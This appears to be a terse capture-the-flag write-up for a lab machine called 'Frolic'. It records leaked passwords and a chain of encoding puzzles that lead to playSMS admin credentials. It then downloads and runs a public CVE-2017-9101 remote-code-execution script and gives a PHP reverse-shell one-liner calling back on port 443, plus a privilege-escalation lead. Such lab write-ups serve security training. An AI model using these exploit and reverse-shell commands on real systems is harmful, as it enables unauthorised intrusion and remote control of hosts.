# Frolic


# Findings

  • port 9999
    • /backup/password.txt login password of imnothuman
    • /admin login password of superduperlooperpassword_lol
    • logging in grants a ook language page, decoding gives a path: /asdiSIAJJ0QWE9JAS
    • The contents of that path look like base64 encoded
    • We extract that into a text file and remove spaces
    • Now use base64 -d hash to decode it and redirect output to a file
    • When running file on the newly decoded file, it appears as a zip
    • Unzipping the file with password password reveals another base64 like file in hex
    • Convert hex to base64 with xxd
    • Code is brain**** and decoding gives idkwhatispass
    • For the /playsms directory, the username admin/idkwhatispass works
wget https://github.com/jasperla/CVE-2017-9101/raw/master/playsmshell.py

python3 playsmshell.py --username admin --password idkwhatispass --url --interactive

Get a better shell back with:

php -r '$sock=fsockopen("",443);exec("/bin/sh -i <&3 >&3 2>&3");'

# Priv esc

/var/www/html/playsms/plugin/themes/ubuntu/config.php writable, used by playsms